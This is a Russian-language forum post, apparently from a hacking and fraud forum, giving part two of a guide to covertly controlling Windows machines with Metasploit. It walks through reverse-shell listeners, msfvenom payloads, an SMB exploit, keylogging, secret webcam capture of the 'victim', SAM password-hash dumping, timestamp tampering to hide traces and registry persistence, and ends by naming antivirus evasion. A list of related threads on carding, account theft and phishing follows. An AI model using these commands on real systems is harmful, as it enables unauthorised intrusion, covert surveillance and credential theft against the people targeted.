Мануал: Скрытое управление компьютером на Windows (используя Metasploit) #2

  • Автор темы klobald
  • Дата начала
K

klobald

Original poster
Ссылка на 1 часть:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



Работа с бэкдорами в Metasploit
На «атакующей» машине запускаем Metasploit:
Код:
msfconsole

Далее
Код:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
Обратите внимание, что если вместо windows/meterpreter/reverse_tcp вы выбрали другую полезную нагрузку, то в предыдущей команде замените эту строку на свою.

Нужно установить настройки – IP и порт локальной машины:
Код:
set LHOST 192.168.0.196
set LPORT 4444
Не забудьте строку 192.168.0.196 поменять на свой IP адрес. Если вы не меняли порт, то его можно не настраивать, поскольку значением по умолчанию является 4444.

Когда настройки сделаны, запустите выполнение модуля:
Код:
run

11d5ad1a678b5226977d5.png

Теперь на «цели» запустите исполнимый файл с полезной нагрузкой. Как только это будет сделано, бэкдор подключится к машине атакующего и откроется сессия meterpreter:

90c7b4b689b40da5d13b4.png

Основы работы в Meterpreter (Meta-Interpreter)
Для показа справки наберите ? или help. Разнообразных команд много. Думаю, стоит затратить время, чтобы ознакомится с ними со всеми. Если вы хотите получить информацию об опциях конкретной команды, напишите команду и добавьте флаг -h, например, следующая команда покажет опции модуля для управления веб-камерой:
Код:
webcam_snap -h

2d6f0e468dd16c3d3fe8a.png

Основные команды:

2a4bc444ca52728f7f80d.png

Итак, с помощью ключевых команд мы можем автоматизировать процесс (выполнять команды из файла), записывать данные в канал, для последующего использования, выполнять долгие задачи в фоне. Особенно обратим внимание на команды info и run – первая покажет информацию об интересующем модуле последующей эксплуатации, а вторая запустит выбранный модуль – к этим вопросам мы вернёмся позже.

Рассмотрим команды файловой системы, некоторые из них имеют одинаковые названия с аналогичными командами в оболочке Linux:

87e6343f9a06d22ffc54f.png

Например, я хочу на удалённый компьютер выгрузить файл driver_dlya_tvoego_computera.exe:
Код:
upload driver_dlya_tvoego_computera.exe

eb64402ff996c14b60398.png

Просматриваем список файлов на удалённом компьютере и загружаем с него файл allen.zip:
Код:
ls
download allen.zip

5aebf461c0f02196e5b12.png

Сетевые команды:

c20df84f8f5408062f20a.png

Системные команды:

04566a985c525ac6c597b.png

Системные команды позволяют получить доступ к удалённой оболочке, что даёт возможность непосредственно вводить команды, позволяют завершать процессы, выключать или перезагружать компьютер, выполнять команды уровня ОС, а также собирать информацию и заметать следы.

Команды пользовательского интерфейса:

f4c92618c16038a817352.png

Данный набор команд позволяет делать скриншоты с удалённого компьютера, отключать и включать мышь, клавиатуру, следить на нажатыми пользователем клавишами.

Для начала захвата нажатия клавиш введите:
Код:
keyscan_start

Чтобы посмотреть, какие клавиши и в каких программах ввёл пользователь выполните:
Код:
keyscan_dump

67b9e17302f47c93dc908.png

Команды для управления веб-камерой:

691b4ed7865a4082a0dcd.png

На мой взгляд, очень интересные функции. Чтобы проверить, имеет ли компьютер жертвы веб-камеры выполните
Код:
webcam_list

В моём случае обнаружена одна веб-камера SC-20FHL11146M, чтобы сделать с неё снимок набираю (замените имя веб-камеры):
Код:
webcam_snap SC-20FHL11146M

Будет сделана и показана фотография с веб-камеры удалённого компьютера.

1ef5e09be3f8401270370.png

Команды повышения привилегий:
Код:
getsystem    Пытается поднять ваши привилегии на данной локальной системе.

Команда для работы с базой данных паролей:
Код:
hashdump     Дампит содержимое базы данных SAM

Команды для работы с Timestomp (временными метками файла):
Код:
timestomp    Манипуляция файловыми атрибутами MACE

Чтобы замести следы, иногда может быть полезным изменить атрибуты MACE (запись изменения, доступа, создания) файла.

Скрытый доступ к удалённому рабочему столу (VNC)
Для скрытого доступа к удалённому рабочему столу посредством VNC нужно выбрать полезную нагрузку, содержащую слово vncinject, к примеру, такой полезной нагрузкой является windows/vncinject/reverse_tcp:
Код:
msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.0.196 -f exe -o vnc.exe

Далее запустите Metasploit (если вы это ещё не сделали):
Код:
msfconsole

Внутри Metasploit:
Код:
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
set payload windows/vncinject/reverse_tcp
set lhost 192.168.0.196
set rhost 192.168.0.244
run
Обратите внимание, что в отличие от работы с Meterpreter, мы используем exploit/windows/smb/ms09_050_smb2_negotiate_func_index. Также нам необходимо установить IP адрес удалённого хоста (set rhost 192.168.0.244).

После запуска эксплойта, запустите исполнимый файл с полезной нагрузкой на компьютере жертвы. Вы увидите удалённый рабочий стол компьютера жертвы.

В качестве альтернативы, можно использовать 64-битную версию полезной нагрузки: windows/x64/vncinject/reverse_tcp.

На машине атакующего должен быть установлен VNC клиент (просмотрщик).

Закрепление доступа
До недавнего времени для закрепления доступа – создания бэкдора, который запускается при каждой загрузки системы – использовался скрипт persistence:
Код:
run persistence -h

Но в настоящее время скрипты Meterpreter считаются устаревшими, поэтому рекомендуется использовать модуль post/windows/manage/persistence_exe. Это Windows Manage Persistent EXE Payload Installer, т.е. установщик постоянной полезной нагрузки EXE в Windows.

Этот модуль выгрузит на удалённый хост исполнимый файл и сделает его постоянным – т.е. скопирует в определённое место и добавит ключ в реестр Windows для автоматического запуска при каждом старте Windows. Он может быть установлен как USER, SYSTEM или SERVICE. При выборе USER, программа запустится при входе пользователя; при выборе SYSTEM – запустится при загрузке системы, для этого требуются соответствующие привилегии; при выборе SERVICE будет создана служба, которая запустит полезную нагрузку, также требуются привилегии.

Опции модуля:
Имя Текущее значение Требуется Описание
---- --------------- -------- -----------
REXENAME default.exe да Имя exe файла на удалённой системе
REXEPATH да Файл, который нужно загрузить на удалённую систему
SESSION да Сессия, на которой запустить этот модуль
STARTUP USER да Тип запуска постоянной нагрузки. (Варианты: USER, SYSTEM, SERVICE)​
Пример запуска:
Код:
run post/windows/manage/persistence_exe REXEPATH=/local/path/to/your/payload.exe REXENAME=default.exe STARTUP=SYSTEM

Эта команда означает, что на удалённый хост будет выгружен файл payload.exe, который на локальной системе размещён по пути /local/path/to/your/payload.exe, этот файл на удалённой системе будет переименован в default.exe и будет запущен с системными привилегиями.

Ещё один пример:
Код:
run post/windows/manage/persistence_exe REXEPATH=/home/mial/backdoor2.exe

dfcc02f6b7aae32d261c1.png

Модуль вывел следующую информацию:
Код:
[*] Running module against MIAL-PC
[*] Reading Payload from file /home/mial/backdoor2.exe
[+] Persistent Script written to C:/Users/Alex/AppData/Local/Temp/default.exe
[*] Executing script C:/Users/Alex/AppData/Local/Temp/default.exe
[+] Agent executed with PID 6572
[*] Installing into autorun as HKCU/Software/Microsoft/Windows/CurrentVersion/Run/MHlFtyrXIllAQ
[+] Installed into autorun as HKCU/Software/Microsoft/Windows/CurrentVersion/Run/MHlFtyrXIllAQ
[*] Cleanup Meterpreter RC File: /home/mial/.msf4/logs/persistence/MIAL-PC_20170519.0352/MIAL-PC_20170519.0352.rc

Т.е. на удалённой системе файл сохранён по пути C:/Users/Alex/AppData/Local/Temp/default.exe, для автозапуска сделана запись в реестре Windows по пути HKCU/Software/Microsoft/Windows/CurrentVersion/Run/MHlFtyrXIllAQ.

91f3f013013053037b62b.png

Модули последующей эксплуатации Metasploit
post/windows/manage/persistence_exe – это всего лишь один из модулей последующей эксплуатации, которые присутствуют в Metasploit для Windows.

Некоторые примеры:
  • post/windows/gather/enum_chrome – извлечение чувствительной информации из веб-браузера Google Chrome
  • post/windows/gather/credentials/total_commander – извлечение паролей из Total Commander
  • post/windows/escalate/screen_unlock – разблокировка экрана Windows (будьте осторожны с этим модулем)
  • post/windows/gather/phish_windows_credentials – фишинговая атака на учётные данные Windows
Количество модулей достаточно велико:

60d9c2a11bf810a665236.png

Все эти модули можно применять во время сеанса Meterpreter.

Когда обратный шелл не нужен
Если вы можете установить бэкдор на целевой компьютер, то вполне возможно, что вам подойдут другие альтернативы, а обратный шелл просто не нужен. Например, если на целевой машине уже запущен SSH сервер, то вы можете попытаться добавить к нему нового пользователя и использовать его.

Если целевая машина – это веб-сервер, который поддерживает на стороне сервера язык программирования, то вы можете оставить бэкдор на этом языке. Например, многие сервера Apache поддерживают PHP, в этом случае вы можете использовать PHP "web shell". IIS сервера обычно поддерживают ASP, или ASP.net. Metasploit Framework предлагает полезные нагрузки на всех этих языках (и многих других).

Аналогично для VNC, удалённого рабочего стола, SMB (psexec), других инструментов удалённого администрирования и т.д.

Заключение
Итак, как мы могли сами убедиться MSFvenom позволяет генерировать полезную нагрузку, а Meterpreter помогает скрыто управлять удалённой системой.

В целом это обзорная статья, цель которой – показать некоторые возможности

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

. В реальной практической ситуации нужно подобрать полезную нагрузку в соответствии с разными сценариями: на случай смены IP жертвой, на случай смены IP атакующим, решить проблемы доставки полезной нагрузки и избежание обнаружения антивирусами.
 
  • Like
Реакции: babaxa32 и Flamer
Название темы
Автор Заголовок Раздел Ответы Дата
K Мануал: Скрытое управление компьютером на Windows (используя Metasploit) #1 Уязвимости и взлом 3
Denik Интересно Мануал по работе с Amazon Обучения, схемы, мануалы 22
H Мануал по Maltego. Сбор информации Корзина 0
Denik Интересно Мануал по вбиву сс Обучения, схемы, мануалы 5
Denik Мануал по заработку Способы заработка 1
M Раздам Мануал по Ставкам Другое 25
B 6 Лендингов Adalt/Dating & (Мануал по арбитражу) Другое 0
Allen Мануал по самостоятельной добыче CC+VBV Полезные статьи 0
АнАлЬнАя ЧуПаКаБрА Мануал по рефу электроники Другое 4
Uno-uno Закрыто Спецтехника Мануал (белая схема) Корзина 3
Uno-uno Закрыто Мануал по UBER поездки Корзина 2
F Мануал по заработку | Серое Способы заработка 8
K Мануал по взлому вк Способы заработка 10
K Мануал по рефанду в Amazon Способы заработка 0
M Мануал по безопасности за 10к Другое 3
G Мануал: Атакуем WhatsApp СИ/Фишинг/Мошенничество 0
Traven Мануал получения платных схем [СЛИВ] Способы заработка 3
G Мануал: подмена ссылки Вконтакте Полезные статьи 0
G Мануал: Способ халявного интернет трафика Полезные статьи 2
G Мануал по взлому страничек VK СИ/Фишинг/Мошенничество 4
Р Мануал по восстановлению чужих симкарт РУ. МТС и билайн. Способы заработка 1
S Мануал: Три черные схемы по Vk Способы заработка 0
S Мануал: Пробив информации по номеру телефона Полезные статьи 4
S Мануал: Способ добычи инсталлов Другое 0
S Мануал по вбиву PP со своей "фишкой" Способы заработка 9
I Мануал по взлому ВК и набиву инсталлов by InsBaron. [ОФ. СЛИВ] СИ/Фишинг/Мошенничество 24
D Слив схемы зароботка с дарквеба за 8к / Мануал по взлому ВК и Инсталлам. Взлом на заказ. СИ/Фишинг/Мошенничество 5
V Мануал по взлому ВК (эксклюзив) Полезные статьи 2
@ [Слив] Мануал по телеге, 35 страниц. Способы заработка 6
АнАлЬнАя ЧуПаКаБрА Мануал по работе с аккаунтами OZON Другое 1
M Мануал по работе с платежными системами. Анонимный ввод / вывод Полезные статьи 7
I Мануал по pyrit (утилита для взлома WiFi) Полезные статьи 1
A Мануал по угону автомобиля Способы заработка 19
M [Пассив] Мануал по заработку в Instagram Способы заработка 1
M Мануал по пакету программ "aircrack-ng" Полезные статьи 0
M Мануал по заработку на порно(Белая) Способы заработка 2
Danzila Мануал SQL. Полезные статьи 0
Little_Prince Мануал KorbenDallas Cyberfox-JAP Анонимность и приватность 0
АнАлЬнАя ЧуПаКаБрА Мануал по длинным поездка Яндекс.Такси [До 5000р] Полезные статьи 1
obscure Мануал по добыче аккаунтов VK (слито) СИ/Фишинг/Мошенничество 92
АнАлЬнАя ЧуПаКаБрА Мануал по отвязке iCloud Другое 3
D Мануал по флуду + софт Другое 4
B Мануал - заработок от 3000 в день! Корзина 6
opnot Мануал по взлому хешей Полезные статьи 0
adflak Ipiar управление репутацией Ищу работу. Предлагаю свои услуги. 0
Y YogaDNS – управление днс трафиком Полезные статьи 0
K Удаление негативной информации, отзывов, анкет, страниц, каналов, выдачи поисковиков, компромата, управление репутацией, доступ! Ищу работу. Предлагаю свои услуги. 0
M Mem Reduct - управление памятью в реальном времени Настройка системы для работы 0
1 DroidJack 4.4 Удаленное управление Android Spam/DDOS/Malware 0
1 DroidJack 4.4 Удаленное управление Android Софт для работы с текстом/Другой софт 1

Название темы